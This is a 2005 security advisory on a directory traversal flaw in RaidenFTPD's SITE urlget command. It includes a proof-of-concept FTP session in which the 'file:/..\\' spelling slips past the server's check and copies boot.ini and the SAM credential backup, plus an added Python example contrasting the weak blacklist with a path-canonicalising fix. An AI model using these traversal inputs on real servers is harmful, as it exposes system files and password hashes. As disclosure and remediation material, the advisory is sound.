raidenftpdTraverse.txt

πŸ—“οΈΒ 02 Jul 2005Β 00:00:00Reported byΒ Lachlan. HTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 17Β Views

RaidenFTPD version < 2.4.2241 Directory Traversal security issue

Product : RaidenFTPD   
  
Affected Versions : < 2.4.2241  
  
***  
  
Author: Lachlan. H  
  
Date vendor notified: 19/04/2005  
  
Patch released: 20/04/2005  
  
Disclosure: 02/05/2005  
  
  
***  
  
Product Description:  
  
RaidenFTPD is an easy-to-use FTP server for Windows™. With it you  
can share files with friends, provide file download services to  
customers or even set up your own private network file server.  
Not only are all the basic FTP server features built in; it also  
offers advanced features such as SSL/TLS, UTF-8, UPnP NAT  
traversal and more.  
  
***  
  
Problem:   
  
Directory Traversal - failure to validate the URL argument of the  
SITE command 'urlget'.  
  
'urlget' fetches a URL into the user's current FTP directory. The  
server refuses a file URL written as file://\..\\... and logs it  
as a hacking attempt, but the equivalent file:/..\\... spelling is  
not caught and the '..' components are honoured. A normal  
(non-administrative) user can therefore escape ftproot, copy any  
file whose path is known (e.g. boot.ini, or the SAM backup under  
winnt\repair) into their own directory, and then download it with  
an ordinary RETR.  
  
The JohnLong Team acted promptly to resolve the issue.  
  
***  
  
Fix:  
  
http://www.raidenftpd.com/en/  
  
FULL :  
http://www.raidenmaild.com/download/raidenftpd2.exe  
UPDATE :  
http://www.raidenmaild.com/download/update.exe  
  
***  
  
PoC:  
  
230 User ****** logged in.  
ftp> quote site urlget file://\..\\boot.ini  
550 site urlget failed : hacking attempt , you have  
been logged.  
ftp> quote site urlget file:/..\\boot.ini  
220 site urlget : downloading  
file:/..\\boot.ini->boot.ini  
ftp> ls  
200 Port command ok.  
150 Opening ASCII data connection for ls /.  
boot.ini  
226-free disk space under this directory : 28919 mb  
226 Transfer finished successfully.   
Data connection closed .  
ftp: 10 bytes received in 0.00 Seconds 10000.00Kbytes/sec.  
ftp> quote site urlget file:/..\\winnt/repair/sam  
220 site urlget : downloading  
file:/..\\winnt/repair/sam->sam  
ftp> ls  
200 Port command ok.  
150 Opening ASCII data connection for ls /.  
boot.ini  
sam  
226-free disk space under this directory : 28919mb  
226 Transfer finished successfully.   
Data connection closed .  
ftp: 15 bytes received in 0.00 Seconds 15000.00Kbytes/sec.  
ftp>  
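The session above shows the whole bug in two lines: the same traversal is refused when spelled file://\..\\ and accepted when spelled file:/..\\, so the server was pattern-matching the URL text rather than resolving where it points. The following is an added example written for this page, not RaidenFTPD's source. It places a prefix blacklist of the kind the PoC defeats (the vendor's real check is not published; this one is an assumption shaped by the two responses) beside a canonicalise-then-compare check that maps every file: URL to a Windows path and refuses anything that does not land under ftproot. FTPROOT and the sample URLs are constructed for the example.

```python
"""Added example: modelling the urlget traversal and its fix (not vendor code)."""
import ntpath
import re
from typing import Optional

FTPROOT = r"C:\ftproot"   # assumed server root, constructed for this example


def weak_urlget_allowed(url: str) -> bool:
    """Blacklist check: only the 'file://' spelling combined with '..' is refused.

    Assumption modelled on the PoC: 'file://\\..\\boot.ini' is logged as a
    hacking attempt while 'file:/..\\boot.ini' goes through. Returns True
    when the request would be allowed."""
    return re.match(r"(?i)^file://.*\.\.", url) is None


def local_target(url: str) -> Optional[str]:
    """Turn a file: URL into the Windows path the server would actually open.

    Any run of leading '/' or '\\' after 'file:' is stripped so that
    'file:/x', 'file://x' and 'file:///x' all name the same thing; the
    remainder is taken relative to FTPROOT and normalised, which is what
    collapses the '..' components. Other schemes are not modelled here
    and yield None."""
    m = re.match(r"(?i)^file:(.*)$", url)
    if m is None:
        return None
    rest = m.group(1).lstrip("/\\").replace("/", "\\")
    return ntpath.normpath(ntpath.join(FTPROOT, rest))


def hardened_urlget_allowed(url: str) -> bool:
    """Allow only targets that, after canonicalisation, sit under FTPROOT.

    ntpath.commonpath() is drive- and case-aware for Windows paths and
    raises ValueError when the drives differ (e.g. 'file:/D:\\x'), which is
    itself a reason to refuse."""
    target = local_target(url)
    if target is None:
        return False
    root = ntpath.normpath(FTPROOT)
    try:
        return ntpath.commonpath([root, target]) == root
    except ValueError:
        return False


if __name__ == "__main__":
    # The two URLs from the PoC plus a benign one (constructed inputs).
    samples = (r"file://\..\\boot.ini", r"file:/..\\boot.ini", r"file:/pub/readme.txt")
    for url in samples:
        print(f"{url:26} weak={weak_urlget_allowed(url)!s:5} "
              f"hardened={hardened_urlget_allowed(url)!s:5} -> {local_target(url)}")
```

The hardened check deliberately does not look at the URL text at all: it decides on the resolved path, so alternative spellings (extra slashes, forward slashes, a drive letter, a different case) are all judged by where they end up rather than by what they look like.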
  
***  
  
  
